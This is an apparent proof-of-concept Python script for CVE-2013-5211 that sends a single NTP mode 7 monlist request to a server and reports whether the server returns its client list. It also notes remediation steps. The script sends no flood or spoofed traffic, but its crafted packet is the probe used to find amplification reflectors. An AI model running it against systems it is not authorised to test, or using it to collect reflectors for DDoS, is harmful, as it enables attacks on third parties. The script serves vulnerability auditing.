# PoC Title: Network Time Protocol Daemon (ntpd) monlist Command Enabled DoS
# CVE Number: CVE-2013-5211
# Date: Saturday, February 4, 2023
# PoC Author: 0xhav0c
# Version: <= NTP version 4.2.7-p26
import sys
import socket
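def _is_monlist_reply(data):
    """Return True when *data* is a successful mode 7 monlist response with entries.

    Mode 7 header layout used here: byte 0 carries the response bit (0x80)
    and the mode in the low three bits, byte 3 echoes the request code, and
    bytes 4-5 hold a 4-bit error code followed by a 12-bit item count.
    """
    if len(data) < 8:
        return False
    is_response = bool(data[0] & 0x80)
    mode = data[0] & 0x07
    request_code = data[3]
    error_code = data[4] >> 4
    item_count = ((data[4] & 0x0F) << 8) | data[5]
    # A non-zero error code (for example "no data" when monitoring is
    # disabled) or an empty list means the server is not handing out its
    # client list, so it must not be reported as exposed.
    return (
        is_response
        and mode == 7
        and request_code == 0x2A
        and error_code == 0
        and item_count > 0
    )


def vuln(server):
    """Check whether an NTP server answers the mode 7 ``monlist`` query.

    Sends one 48-byte monlist request to UDP port 123 of *server* and
    inspects the reply. A server that answers with a populated monlist
    response is exposed to CVE-2013-5211 (traffic amplification via
    monlist). Remediation is to upgrade ntpd, or to set ``disable monitor``
    or a ``restrict ... noquery`` rule in ntp.conf.

    Args:
        server: Host name or IPv4 address of the NTP server to audit.

    Returns:
        True if a successful monlist response was received, False if the
        server replied with something else or the port is closed.

    Raises:
        SystemExit: on a 5 second timeout. No answer is inconclusive for
            UDP (packet loss or filtering), so no verdict is returned.
    """
    # Request header: 0x17 = version 2 / mode 7 (private), 0x00 = no auth,
    # sequence 0, 0x03 = XNTPD implementation, 0x2a = MON_GETLIST_1.
    ntppacket = bytearray(48)
    ntppacket[0:4] = bytes((0x17, 0x00, 0x03, 0x2A))

    server = socket.gethostbyname(server)
    address = (server, 123)

    # The context manager closes the socket on every exit path, including
    # the SystemExit raised on timeout.
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(5)
        # Connecting the UDP socket makes the kernel discard datagrams from
        # any other source, so a stray packet cannot produce a false verdict.
        sock.connect(address)
        try:
            sock.send(ntppacket)
            data = sock.recv(1024)
        except socket.timeout:
            print("Timeout:", server)
            sys.exit(0)
        except ConnectionError:
            # ICMP port unreachable: nothing is listening on UDP 123.
            print("Server not vulnerable:", address)
            return False

    if _is_monlist_reply(data):
        print("This NTP Server has CVE-2013-5211 Vulnerability:", address)
        return True

    # Any other reply (error response, unrelated payload, empty datagram)
    # is not evidence that monlist is enabled.
    print("Server not vulnerable:", address)
    return False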
if __name__ == '__main__':
    # Command-line entry point: expects the NTP server to check as the
    # first positional argument.
    arguments = sys.argv
    if not len(arguments) >= 2:
        print("Usage: python3", arguments[0], "<server>")
        sys.exit(0)

    target = arguments[1]
    # vuln() prints its own per-server verdict; the summary line below
    # repeats the outcome against the argument exactly as the user typed it.
    if vuln(target):
        summary = "IP Address has Network Time Protocol Daemon (ntpd) monlist Command Enabled DoS:"
    else:
        summary = "IP Address has not Network Time Protocol Daemon (ntpd) monlist Command Enabled DoS:"
    print(summary, target)